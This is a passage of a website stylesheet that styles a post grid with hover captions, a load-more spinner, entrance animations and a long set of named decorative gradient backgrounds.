  -o-transition: .7s cubic-bezier(0.300,0,0.100,1.100) .1s;
  transition: .7s cubic-bezier(0.300,0,0.100,1.100) .1s;
  -webkit-transition-property: -webkit-transform, opacity;
  -moz-transition-property: -moz-transform, opacity;
  transition-property: transform, opacity;
  -ms-transform: translateY(-20%);
  -webkit-transform: translateY(-20%);
  transform: translateY(-20%);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.2);
  opacity: 0;
  z-index: 2;
}
.ajax-post .inner.overlay .intro-image a .caption-content small {
  font-size: 12px;
  margin: 0 4px;
  display: inline-block;
}
.ajax-post .inner.overlay .intro-image a .caption-content small >i {
  font-size: 125%;
  vertical-align: middle;
  margin: -2px 3px 0;
}
.ajax-post .inner.overlay .intro-image a .caption-content small.ratings {
  font-size: 11px;
}
.ajax-post .inner.overlay .intro-image a .caption-content small .voting-symbol {
  font-size: 10px;
}
.ajax-post .inner.overlay .intro-image a .caption-content .caption-category {
  padding: 2px 12px;
  display: table;
  width: auto;
  margin: 8px auto 0;
  background: rgba(255,255,255,0.25);
  border-radius: 4px;
  box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  font-weight: 500;
  font-size: 12px;
  color: #fff;
}
.ajax-post .inner.overlay .intro-image a .caption-content .caption-category .posted-in {
  opacity: 0.65;
}
.ajax-post .inner.overlay .intro-image a:hover:after {
  background: rgba(241,72,51,0.65);
}
.ajax-post .inner.overlay .intro-image a:hover .caption-content {
  opacity: 1;
  -ms-transform: translateY(-50%);
  -webkit-transform: translateY(-50%);
  transform: translateY(-50%);
}
.loader_footer,
.grid_footer,
#dc-load-more {
  position: relative;
  clear: both;
  overflow: hidden;
  opacity: 1;
  display: block;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  -webkit-transition: all .45s ease;
  -moz-transition: all .45s ease;
  -o-transition: all .45s ease;
  transition: all .45s ease;
  margin: 15px auto 0;
  width: 100%;
  height: 44px;
  -webkit-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
}
.loader_footer .load-more-ajax,
.grid_footer .load-more-ajax,
#dc-load-more .load-more-ajax {
  margin: 0 auto;
  height: 44px;
}
.loader_footer.done,
.grid_footer.done,
#dc-load-more.done {
  opacity: 0;
  visibility: hidden;
  height: 0;
  -webkit-transform: rotateX(-90deg);
  transform: rotateX(-90deg);
}
@-webkit-keyframes simpleFade {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
@keyframes simple-fade {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
.simple-fade {
  -webkit-animation-name: simple-fade;
  animation-name: simple-fade;
  -webkit-backface-visibility: hidden;
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
@-webkit-keyframes fade-in-up {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,50px,0);
    transform: translate3d(0,50px,0);
  }
  100% {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
@keyframes fade-in-up {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,50px,0);
    transform: translate3d(0,50px,0);
  }
  100% {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
.fade-in-up {
  -webkit-animation-name: fade-in-up;
  animation-name: fade-in-up;
  -webkit-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
  -webkit-backface-visibility: hidden;
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
@-webkit-keyframes fade-in-down {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-50px,0);
    transform: translate3d(0,-50px,0);
  }
  100% {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
@keyframes fade-in-down {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-50px,0);
    transform: translate3d(0,-50px,0);
  }
  100% {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
.fade-in-down {
  -webkit-animation-name: fade-in-down;
  animation-name: fade-in-down;
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
@-webkit-keyframes appear-in {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-10px,0) scale(0.7) perspective(1200px) rotateX(-60deg);
    transform: translate3d(0,-10px,0) scale(0.7) perspective(1200px) rotateX(-60deg);
  }
  45% {
    opacity: 0.4;
    -webkit-transform: translate3d(0,20%,0) scale(1.05) perspective(600px) rotateX(-15deg);
    transform: translate3d(0,20%x,0) scale(1.05) perspective(600px) rotateX(-15deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
  }
}
@keyframes appear-in {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-10px,0) scale(0.7) perspective(1200px) rotateX(-60deg);
    transform: translate3d(0,-10px,0) scale(0.5) perspective(1200px) rotateX(-60deg);
  }
  45% {
    opacity: 0.4;
    -webkit-transform: translate3d(0,20%,0) scale(1.05) perspective(600px) rotateX(-15deg);
    transform: translate3d(0,20%,0) scale(1.05) perspective(600px) rotateX(-15deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
  }
}
.appear-in {
  -webkit-animation-name: appear-in;
  animation-name: appear-in;
  -webkit-backface-visibility: hidden;
  -webkit-transform-origin: 50% 0%;
  transform-origin: 50% 0%;
  -webkit-animation-duration: 1.2s;
  animation-duration: 1.2s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
.flippin-effect {
  margin: 0 auto;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  -webkit-transform-origin: 50% 0%;
  transform-origin: 50% 0%;
  -webkit-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
  -moz-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
  -ms-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
  -o-animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
  animation: flippin .85s cubic-bezier(0.400,0,0.350,1.100) forwards;
}
@-webkit-keyframes flippin {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    -moz-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    -ms-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    -o-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
  }
  to {
    opacity: 1;
    -webkit-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    -moz-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    -ms-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    -o-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
  }
}
@keyframes flippin {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    -moz-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    -ms-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    -o-transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
    transform: translate3d(0,20%,0) scale(0.9) perspective(1300px) rotateX(-70deg);
  }
  to {
    opacity: 1;
    -webkit-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    -moz-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    -ms-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    -o-transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
    transform: translate3d(0,0,0) scale(1) perspective(1000px) rotateX(0deg);
  }
}
@-webkit-keyframes intro-zoom-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(0) scale(0.5);
    transform: translateZ(0) scale(0.5);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(120px) scale(1);
    transform: translateZ(120px) scale(1);
  }
}
@keyframes intro-zoom-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(0) scale(0.5);
    transform: translateZ(0) scale(0.5);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(120px) scale(1);
    transform: translateZ(120px) scale(1);
  }
}
.intro-zoom-in {
  -webkit-animation-name: intro-zoom-in;
  animation-name: intro-zoom-in;
  -webkit-backface-visibility: hidden;
  -webkit-animation-duration: 0.8s;
  animation-duration: 0.8s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
.loader_footer .load-more-ajax {
  outline: 0;
}
.loader_footer .load-more-ajax.focus,
.loader_footer .load-more-ajax:focus,
.loader_footer .load-more-ajax:active,
.loader_footer .load-more-ajax.active {
  -webkit-box-shadow: none !important;
  box-shadow: none !important;
  text-align: center;
}
.loader_footer .load-more-ajax .spinner {
  outline: 0;
  text-align: center;
  line-height: 13px;
}
.loader_footer .load-more-ajax .spinner > div {
  width: 14px;
  height: 14px;
  line-height: 13px;
  text-align: center;
  margin: 0 -2px 0 2px;
  vertical-align: middle;
  border-radius: 100%;
  display: inline-block;
  -webkit-animation: dc-load-more-bouncedelay 1.2s infinite ease-in-out both;
  animation: dc-load-more-bouncedelay 1.2s infinite ease-in-out both;
}
.loader_footer .load-more-ajax .spinner .bounce1 {
  -webkit-animation-delay: -0.5s;
  animation-delay: -0.5s;
}
.loader_footer .load-more-ajax .spinner .bounce2 {
  -webkit-animation-delay: -0.25s;
  animation-delay: -0.25s;
}
@-webkit-keyframes dc-load-more-bouncedelay {
  0%,
  80%,
  100% {
    -webkit-transform: scale(0.2);
    opacity: 0;
  }
  40% {
    -webkit-transform: scale(1);
    opacity: 1;
  }
}
@keyframes dc-load-more-bouncedelay {
  0%,
  80%,
  100% {
    -webkit-transform: scale(0.2);
    transform: scale(0.2);
    opacity: 0;
  }
  40% {
    -webkit-transform: scale(1);
    transform: scale(1);
    opacity: 1;
  }
}
@media (max-width: 480px) {
  .ajax-posts .ajax-post .intro-left > div,
  .ajax-posts .ajax-post .intro-right > div {
    width: 100% !important;
    padding-left: 0 !important;
    padding-right: 0 !important;
  }
  .ajax-posts .ajax-post .intro-left > div .aga_heading,
  .ajax-posts .ajax-post .intro-right > div .aga_heading {
    margin-top: 25px !important;
  }
}
.spectrum-background {
  background: linear-gradient(red,transparent), linear-gradient(to top left,lime,transparent), linear-gradient(to top right,blue,transparent);
  background-blend-mode: screen;
}
.elegant-rainbow {
  background: linear-gradient(219.46deg,#110036 27.63%,#170059 100%), linear-gradient(219.46deg,#FFFFFF 27.63%,#19004E 100%), radial-gradient(100% 246.94% at 100% 100%,#FFFFFF 0%,#000353 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(192.86deg,#F06060 9.22%,#008B7A 87.25%), linear-gradient(150.76deg,#0015D5 15.35%,#000B6C 89.57%);
  background-blend-mode: screen, overlay, overlay, difference, difference, normal;
}
.colored-petal {
  background: radial-gradient(circle at 50% 50%,#FFFFFF 0%,#000000 100%), conic-gradient(red,yellow,lime,aqua,blue,fuchsia,red);
  background-blend-mode: color-dodge, normal;
}
.energetic-soul {
  background: linear-gradient(0deg,#FFFFFF 0%,#5C0000 100%), radial-gradient(100% 246.94% at 0% 100%,#E4FFCF 0%,#00B43D 100%), linear-gradient(238.72deg,#0065FC 0%,#61FF00 100%), radial-gradient(100% 188.01% at 76.14% 0%,#80FF00 0%,#00FFF0 100%), linear-gradient(0deg,#00C2FF 0%,#FFC700 100%), linear-gradient(121.28deg,#8000FF 0%,#0085FF 100%), radial-gradient(100% 148.07% at 0% 0%,#FC8800 0%,#00FF94 100%);
  background-blend-mode: overlay, multiply, color-dodge, difference, hue, color-dodge, normal;
}
.fable-wave {
  background: linear-gradient(115deg,#d3ffd7 0%,#000000 100%), radial-gradient(90% 100% at 50% 0%,#c8c8c8 0%,#16002d 100%), radial-gradient(100% 100% at 80% 0%,#faff00 0%,#240000 100%), radial-gradient(150% 210% at 100% 0%,#70ff00 0%,#14af7d 0%,#000aff 100%), radial-gradient(100% 100% at 100% 30%,#ff4d00 0%,#00c8ff 100%), linear-gradient(60deg,#ff0000 0%,#7856ff 100%);
  background-blend-mode: overlay, overlay, difference, difference, difference, normal;
}
.bright-brain {
  background: radial-gradient(50% 123.47% at 50% 50%,#00FF94 0%,#720059 100%), linear-gradient(121.28deg,#669600 0%,#FF0000 100%), linear-gradient(360deg,#0029FF 0%,#8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%,#6100FF 0%,#00FF57 100%), radial-gradient(100% 148.07% at 0% 0%,#FFF500 0%,#51D500 100%);
  background-blend-mode: screen, color-dodge, overlay, difference, normal;
}
.confusing-fluid {
  background: linear-gradient(180deg,#000346 0%,#FF0000 100%), linear-gradient(58.72deg,#0029FF 0%,#AA0014 100%), radial-gradient(100% 164.72% at 100% 100%,#FF00A8 0%,#00FF47 100%), radial-gradient(100% 148.07% at 0% 0%,#FFF500 0%,#51D500 100%);
  background-blend-mode: overlay, overlay, difference, normal;
}
.violet-orange {
  background: linear-gradient(123deg,#461B93 0%,#461B93 40%,#6A3CBC calc(41%),#6A3CBC 60%,#8253D7 calc(61%),#8253D7 70%,rgba(255,141,15,0.9) calc(71%),rgba(242,90,72,0.7) 100%);
}
.dynamic-rainbow {
  background: linear-gradient(151.44deg,#1F009B 0%,#FFFFFF 36.75%), linear-gradient(140.54deg,#FFFFFF 27.63%,#860000 100%), linear-gradient(140.54deg,#FFFFFF 27.63%,#510000 100%), linear-gradient(127.43deg,#BECE00 0%,#FFFFFF 100%), radial-gradient(111.5% 111.5% at 83.93% 106%,#FFFFFF 0%,#20009F 100%), radial-gradient(111% 111% at 74.29% -11%,#0500FF 0%,#FFD600 100%), linear-gradient(127.43deg,#B7D500 0%,#2200AA 100%);
  background-blend-mode: multiply, difference, overlay, overlay, difference, difference, normal;
}
.paypal-blue {
  background: linear-gradient(45deg,rgba(32,172,250,0.1) 10%,rgba(255,255,255,0.45) 51%,rgba(255,255,255,0.1) 51%,rgba(32,172,250,0.05) 80%), linear-gradient(45deg,#0b59a7 0%,#20acfa 50%,#0b59a7 100%), linear-gradient(45deg,#f2f6f8 0%,#d8e1e7 50%,#b5c6d0 51%,#e0eff9 100%);
}
.new-blush {
  background: linear-gradient(121.28deg,#DC8400 0%,#FFFFFF 40.08%), linear-gradient(140.54deg,#FF0000 0%,#0047FF 72.37%), linear-gradient(121.28deg,#00E384 0%,#FF0000 100%), linear-gradient(121.28deg,#FA00FF 0%,#00FF38 100%), linear-gradient(127.43deg,#00F0FF 0%,#A80000 100%), radial-gradient(100.47% 100% at 50% 100%,#70FF00 0%,#680199 100%), linear-gradient(127.43deg,#B7D500 0%,#2200AA 100%);
  background-blend-mode: darken, hue, overlay, color, color-dodge, difference, normal;
}
.artificial-nature {
  background: linear-gradient(140.54deg,#608D00 0%,#D30000 72.37%), linear-gradient(58.72deg,#0029FF 0%,#8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%,#6100FF 0%,#00FF57 100%), radial-gradient(100% 148.07% at 0% 0%,#FFF500 0%,#51D500 100%);
  background-blend-mode: color-dodge, overlay, difference, normal;
}
.first-chapter {
  background: linear-gradient(238.72deg,#FFE5C7 0%,#00C288 100%), radial-gradient(90.88% 100% at 50% 0%,#439246 0%,#183766 100%), linear-gradient(121.28deg,#FFEAB6 0%,#003C2A 100%), radial-gradient(64.89% 100% at 50% 0%,#80BAFF 0%,#001E41 100%), linear-gradient(65.05deg,#6F0072 0%,#FFC700 100%);
  background-blend-mode: overlay, screen, color-burn, lighten, normal;
}
.sensitive-destination {
  background: linear-gradient(120deg,#FF00C7 0%,#51003F 100%), linear-gradient(120deg,#0030AD 0%,#00071A 100%), linear-gradient(180deg,#000346 0%,#FF0000 100%), linear-gradient(60deg,#0029FF 0%,#AA0014 100%), radial-gradient(100% 165% at 100% 100%,#FF00A8 0%,#00FF47 100%), radial-gradient(100% 150% at 0% 0%,#FFF500 0%,#51D500 100%);
  background-blend-mode: overlay, color-dodge, overlay, overlay, difference, normal;
}
.illusive-love {
  background: linear-gradient(58.72deg,#FF20DB 0%,#FFFFFF 100%), linear-gradient(180deg,#FFFFFF 0%,#060046 100%), linear-gradient(64.82deg,#AD00FF 0%,#FF0000 100%), linear-gradient(307.27deg,#FF9900 0.37%,#150052 100%), radial-gradient(67.08% 100% at 50% 0%,#76005C 0%,#0500FF 100%), radial-gradient(100% 140% at 100% 0%,#5ED500 0%,#2200AA 100%);
  background-blend-mode: soft-light, overlay, difference, difference, color-burn, normal;
}
.chroma-serenity {
  background: linear-gradient(50.22deg,#0066FF 0%,#FFAA7A 51.63%), linear-gradient(238.72deg,#FF0000 0%,#000000 100%), linear-gradient(301.28deg,#FF0000 0%,#735A00 100%), linear-gradient(121.28deg,#207A00 0%,#950000 100%), linear-gradient(238.72deg,#FFB800 0%,#000000 100%), linear-gradient(238.72deg,#00D1FF 0%,#00FF38 100%), linear-gradient(58.72deg,#B80000 0%,#1B00C2 100%), linear-gradient(125.95deg,#00E0FF 10.95%,#87009D 100%), linear-gradient(263.7deg,#B60000 3.43%,#B100A0 96.57%), linear-gradient(130.22deg,#DBFF00 18.02%,#3300FF 100%);
  background-blend-mode: multiply, color-dodge, difference, color-dodge, difference, lighten, difference, color-dodge, difference, normal;
}
.yellow-tickets {
  background: linear-gradient(180deg,#F7D6FF 0%,#005686 100%), linear-gradient(180deg,#FFFFFF 0%,#060046 100%), linear-gradient(130deg,#00FFA3 0%,#1A003C 100%), linear-gradient(307deg,#FF0000 0%,#3300C6 100%), radial-gradient(50% 72% at 50% 50%,#004584 0%,#00FFB2 100%), radial-gradient(100% 140% at 100% 0%,#5ED500 0%,#2200AA 100%);
  background-blend-mode: soft-light, overlay, difference, difference, color-burn, normal;
}
.red-crossing {
  background: linear-gradient(121.28deg,#A4006C 0%,#FFECA8 100%), linear-gradient(121.28deg,#69003F 0%,#FFF8F8 100%), linear-gradient(238.72deg,#00FFFF 0%,#0212A4 100%), radial-gradient(67.16% 100% at 50% 0%,#FF00B8 0%,#FFFFFF 100%), linear-gradient(140.54deg,#7000FF 0%,#001AFF 72.37%), linear-gradient(307.43deg,#FFE927 0%,#00114D 100%), radial-gradient(107% 142.8% at 15.71% 104.5%,#FFFFFF 0%,#A7AA00 100%), #FFFFFF;
  background-blend-mode: overlay, difference, difference, overlay, difference, difference, difference, normal;
}
.romantic-sun {
  background: linear-gradient(180deg,#FFB7B7 0%,#727272 100%), radial-gradient(60.91% 100% at 50% 0%,#FFD1D1 0%,#260000 100%), linear-gradient(238.72deg,#FFDDDD 0%,#720066 100%), linear-gradient(127.43deg,#00FFFF 0%,#FF4444 100%), radial-gradient(100.22% 100% at 70.57% 0%,#FF0000 0%,#00FFE0 100%), linear-gradient(127.43deg,#B7D500 0%,#3300FF 100%);
  background-blend-mode: screen, overlay, hard-light, color-burn, color-dodge, normal;
}
.another-view {
  background: linear-gradient(238.72deg,#FFB864 0%,#006C4C 100%), radial-gradient(100% 224.43% at 0% 0%,#FCC482 0%,#002E74 100%), linear-gradient(121.28deg,#FFD464 0%,#00553B 100%), linear-gradient(229.79deg,#7534FF 0%,#248900 94.19%), radial-gradient(56.26% 101.79% at 50% 0%,#8F00FF 0%,#493500 100%), linear-gradient(96.19deg,#500052 3.37%,#D5B300 96.63%);
  background-blend-mode: overlay, screen, lighten, hard-light, screen, normal;
}
.bright-leaks {
  background: linear-gradient(121.28deg,#0E5432 0%,#D6AD96 100%), linear-gradient(121.28deg,#FF0000 0%,#FFBABA 100%), linear-gradient(140.54deg,#7000FF 0%,#0015D1 72.37%), linear-gradient(307.43deg,#FFE927 0%,#00114D 100%), radial-gradient(107% 142.8% at 15.71% 104.5%,#FFFFFF 0%,#A7AA00 100%), #FFFFFF;
  background-blend-mode: overlay, overlay, difference, difference, difference, normal;
}
.execute-pink {
  background: linear-gradient(125deg,#FFFFFF 0%,#000000 100%), linear-gradient(200deg,#FFD9E8 0%,#FFD9E8 50%,#DE95BA calc(51%),#DE95BA 60%,#7F4A88 calc(61%),#7F4A88 75%,#4A266A calc(76%),#4A266A 100%), linear-gradient(113deg,#FFD9E8 0%,#FFD9E8 40%,#DE95BA calc(41%),#DE95BA 50%,#7F4A88 calc(51%),#7F4A88 70%,#4A266A calc(71%),#4A266A 100%);
  background-blend-mode: overlay, overlay, normal;
}
.cute-baby {
  background: linear-gradient(180deg,#FFB7B7 0%,#727272 100%), radial-gradient(60.91% 100% at 50% 0%,#FFD1D1 0%,#260000 100%), linear-gradient(127.43deg,#00FFFF 0%,#FFFFFF 100%), radial-gradient(100.22% 100% at 70.57% 0%,#FF0000 0%,#00FFE0 100%), linear-gradient(64.82deg,#DBFF00 0%,#3300FF 100%);
  background-blend-mode: screen, overlay, color-burn, color-dodge, normal;
}
.holographic-painting {
  background: radial-gradient(50% 123.47% at 50% 50%,#00FF94 0%,#FF00C7 100%), linear-gradient(121.28deg,#213100 0%,#FF0000 100%), linear-gradient(360deg,#0029FF 0%,#8FFF00 100%), linear-gradient(114.9deg,#00C6A2 0%,#6A45A8 100%), radial-gradient(100% 148.07% at 0% 0%,#FFFFFF 0%,#1DCD00 100%);
  background-blend-mode: screen, color-dodge, overlay, difference, normal;
}
.blue-morals {
  background: linear-gradient(114.95deg,rgba(235,0,255,0.5) 0%,rgba(0,71,255,0) 34.35%), linear-gradient(180deg,#004B5B 0%,#FFA7A7 100%), linear-gradient(244.35deg,#FFB26A 0%,#3676B1 50.58%,#00A3FF 100%), linear-gradient(244.35deg,#FFFFFF 0%,#004A74 49.48%,#FF0000 100%), radial-gradient(100% 233.99% at 0% 100%,#B70000 0%,#AD00FF 100%), linear-gradient(307.27deg,#1DAC92 0.37%,#2800C6 100%), radial-gradient(100% 140% at 100% 0%,#EAFF6B 0%,#006C7A 57.29%,#2200AA 100%);
  background-blend-mode: hard-light, overlay, overlay, overlay, difference, difference, normal;
}
.dynamic-energy {
  background: linear-gradient(#000346 0%,#ffa000 100%), linear-gradient(60deg,#000522 0%,#00ffe5 100%), radial-gradient(100% 165% at 100% 100%,#ff00a8 0%,#00ff78 100%), radial-gradient(100% 150% at 0% 0%,#fff500 0%,#51d500 100%);
  background-blend-mode: overlay, soft-light, difference, normal;
}
.modern-path {
  background: linear-gradient(127.43deg,#00F0FF 0%,#A80028 100%), radial-gradient(107% 142.8% at 15.71% 104.5%,#F3D0FC 0%,#1700A4 100%), radial-gradient(111% 111% at 74.29% -11%,#A90000 0%,#00FFE0 100%), linear-gradient(127.43deg,#B7D500 0%,#2200AA 100%);
  background-blend-mode: overlay, difference, difference, normal;
}
.blurry-vision {
  background: linear-gradient(42.52deg,rgba(255,77,0,0.5) 14.06%,rgba(0,117,255,0.5) 96.79%), radial-gradient(82.5% 115.5% at 23.57% 109.25%,#C4FFFB 0%,#3300FF 100%), radial-gradient(70.71% 99% at 100% 39.75%,#D50D00 0%,#520027 100%), radial-gradient(80.18% 112.25% at 29.46% -2.5%,#00D5C8 0%,#2200AA 100%);
  background-blend-mode: soft-light, difference, difference, normal;
}
.red-scratch {
  background: linear-gradient(158.09deg,rgba(255,255,255,0.5) 9.62%,rgba(86,18,79,0.5) 81.19%), linear-gradient(127.43deg,#27F2FF 0%,#CB0031 100%), radial-gradient(107% 142.8% at 15.71% 104.5%,#F3D0FC 0%,#1700A4 100%), radial-gradient(100.22% 100% at 70.57% 0%,#FF0000 0%,#00FFE0 100%), linear-gradient(127.43deg,#0095D5 0%,#0E0048 100%);
  background-blend-mode: overlay, difference, difference, exclusion, normal;
}
.purple-darkteal {
  background: radial-gradient(111% 111% at 74.29% -11%,#A93300 0%,#005570 100%), linear-gradient(127.43deg,#00D5C8 0%,#2200AA 100%);
  background-blend-mode: difference, normal;
}
.blue-bleed {
  background: linear-gradient(219.46deg,#110036 27.63%,#170059 100%), linear-gradient(219.46deg,#FFFFFF 27.63%,#19004E 100%), radial-gradient(100% 246.94% at 100% 100%,#FFFFFF 0%,#000353 100%), linear-gradient(121.18deg,#1400FF 0.45%,#3A0000 100%), linear-gradient(337.69deg,#DC52FF 8.44%,#00BDBD 84.19%), linear-gradient(222.34deg,#FFFFFF 12.99%,#008171 87.21%), linear-gradient(150.76deg,#0015D5 15.35%,#000B6C 89.57%);
  background-blend-mode: screen, overlay, overlay, difference, difference, difference, normal;
}
.faded-journey {
  background: linear-gradient(238.72deg,#FFB864 0%,#006C4C 100%), radial-gradient(100% 224.43% at 0% 0%,#FFD19B 0%,#002E74 100%), linear-gradient(121.28deg,#FFD464 0%,#00553B 100%), linear-gradient(229.79deg,#7534FF 0%,#248900 94.19%), radial-gradient(56.26% 101.79% at 50% 0%,#8F00FF 0%,#493500 100%), linear-gradient(96.19deg,#500052 3.37%,#D5B300 96.63%);
  background-blend-mode: overlay, difference, overlay, hard-light, difference, normal;
}
.distroted-flower {
  background: linear-gradient(100deg,#ffffff 10%,#00062f 100%), linear-gradient(120deg,#ff4141 30%,#001c64 110%), radial-gradient(100% 220% at 100% 0%,#8000ff 10%,#ffffff 30%,#00a0ff 100%), linear-gradient(60deg,#2200f2 0%,#530000 100%), linear-gradient(190deg,#b900ff 0%,#00887b 90%), linear-gradient(180deg,#fc0000 0%,#0032ff 75%), linear-gradient(220deg,#00ff37 0%,#ffdf00 60%), radial-gradient(80% 110% at 50% 0%,#000500 0%,#0034bb 100%);
  background-blend-mode: overlay, overlay, color-burn, screen, color-burn, difference, color-dodge, normal;
}
.soil-burst {
  background: radial-gradient(100% 244.46% at 0% 0%,#CCFF00 0%,#FF027C 100%), radial-gradient(50% 122.23% at 50% 50%,#9AA4FF 0%,#306C00 100%), radial-gradient(100.45% 245.58% at 0% 0%,#000AFE 0%,#70FF00 100%), linear-gradient(127.43deg,#7B0007 0%,#8F73FF 100%);
  background-blend-mode: lighten, color-dodge, difference, normal;
}
.pipe-dream {
  background: linear-gradient(238.72deg,#FFB864 0%,#006C4C 100%), radial-gradient(100% 224.43% at 0% 0%,#FCC482 0%,#002E74 100%), linear-gradient(121.28deg,#FFEAB6 0%,#00563C 100%), linear-gradient(229.79deg,#7534FF 0%,#248900 94.19%), radial-gradient(56.26% 101.79% at 50% 0%,#8F00FF 0%,#493500 100%), linear-gradient(65.05deg,#6F0072 0%,#FFD600 100%);
  background-blend-mode: overlay, screen, color-burn, hard-light, screen, normal;
}
.water-ripple {
  background: linear-gradient(301.28deg,#FFFFFF 51.74%,#1B00C0 100%), linear-gradient(121.28deg,#003077 0%,#88DBFF 100%), radial-gradient(100% 188.01% at 76.14% 0%,#43DDFF 0%,#FF0000 100%), linear-gradient(0deg,#DB00FF 0%,#14FF00 100%), radial-gradient(59.2% 100% at 50% 100%,#D50000 0%,#00B2FF 100%), radial-gradient(100% 148.07% at 0% 0%,#D50000 0%,#00FFFF 100%);
  background-blend-mode: multiply, overlay, overlay, overlay, difference, normal;
}
.urban-health {
  background: linear-gradient(140.54deg,#608D00 0%,#D30000 72.37%), linear-gradient(360deg,#0029FF 0%,#8FFF00 100%), radial-gradient(100% 164.72% at 100% 100%,#6100FF 0%,#00FF57 100%), radial-gradient(100% 148.07% at 0% 0%,#FFF500 0%,#51D500 100%);
  background-blend-mode: color-dodge, overlay, difference, normal;
}
.colorful-utopia {
  background: linear-gradient(121.28deg,#010012 0%,#00FF94 100%), linear-gradient(180deg,#00647A 0%,#FFFFFF 100%), linear-gradient(244.35deg,#FFB26A 0%,#C15151 50.58%,#00A3FF 100%), linear-gradient(244.35deg,#E03F3F 0%,#00114B 49.48%,#FF0000 100%), radial-gradient(100% 233.99% at 0% 100%,#FF0000 0%,#AD00FF 100%), linear-gradient(307.27deg,#096F5C 0.37%,#687EB5 50.19%,#8877CE 100%), radial-gradient(100% 140% at 100% 0%,#FF00C7 0%,#006C7A 49.48%,#FF9900 100%);
  background-blend-mode: overlay, difference, overlay, overlay, difference, color-dodge, normal;
}
.radial-ridge {
  background: linear-gradient(121.28deg,#03002C 0%,#00FF94 100%), linear-gradient(180deg,#00647A 0%,#FFFFFF 100%), linear-gradient(244.35deg,#FF8282 0%,#E86B6B 50.58%,#001B29 100%), linear-gradient(244.35deg,#E03F3F 0%,#00114B 49.48%,#FF0000 100%), radial-gradient(100% 216.55% at 0% 0%,#2400FF 0%,#FF0000 44.27%,#610051 100%), linear-gradient(307.27deg,#096F5C 0.37%,#687EB5 50.19%,#8877CE 100%), radial-gradient(56.34% 100% at 36.02% 0%,#FF00C7 0%,#006C7A 38.54%,#FF9900 100%);
  background-blend-mode: overlay, difference, overlay, overlay, difference, color-dodge, normal;
}
.harbor-explorer {
